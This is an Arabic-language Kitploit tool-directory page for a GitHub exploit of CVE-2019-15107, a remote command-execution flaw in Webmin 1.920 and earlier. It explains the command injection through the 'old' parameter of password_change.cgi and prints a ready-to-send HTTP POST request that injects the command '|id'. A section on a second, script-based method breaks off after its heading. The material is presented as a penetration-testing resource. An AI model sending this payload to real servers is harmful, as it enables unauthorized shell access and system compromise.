Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WebminRCE-EXP-CVE-2019-15107- — ثغرة تنفيذ التعليمات البرمجية عن بُعد في ويبمن | Kitploit
أدوات/GitHubGitHub/alewong/webminrce-exp-cve-2019-15107-
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubalewong/webminrce-exp-cve-2019-15107-

WebminRCE-EXP-CVE-2019-15107-

ثغرة تنفيذ التعليمات البرمجية عن بُعد في ويبمن

عرض المستودع
35منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-15107: وحدات الاستغلال المتاحة لثغرة تنفيذ الأوامر عن بُعد في Webmin

  1. وصف الثغرة Webmin هي أداة إدارة نظام قوية تعتمد على الويب، وتُستخدم على نطاق واسع في أنظمة Unix. نظرًا لأن Password_Change.cgi في Webmin يحتوي في معالجة الطلب على ثغرة في حقن الأوامر عبر معلمة old، يمكن للمهاجم استغلالها. عند تمكين المستخدم لوظيفة إعادة تعيين كلمة المرور في Webmin، يمكن للمهاجم استخدام هذه الثغرة لتنفيذ أوامر عشوائية في النظام المُستهدَف، وبالتالي الحصول على Shell للنظام.

الإصدارات المتأثرة: Webmin 1.920 وما دونه

  1. استغلال الثغرة الطريقة الأولى: الكشف اليدوي تصفح الصفحة، بعد تجاهل الشهادة يمكنك رؤية صفحة تسجيل الدخول لـ Webmin step 1

أرسل حزمة البيانات التالية لتنفيذ الأمر id:

POST /password_change.cgi HTTP/1.1 Host: your-ip:10000 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Cookie: redirect=1; testing=1; sid=x; sessiontest=1 Referer: https://your-ip:10000/session_login.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2 step 2

الطريقة الثانية: استخدام السكريبت step 3```

تنزيل الأداة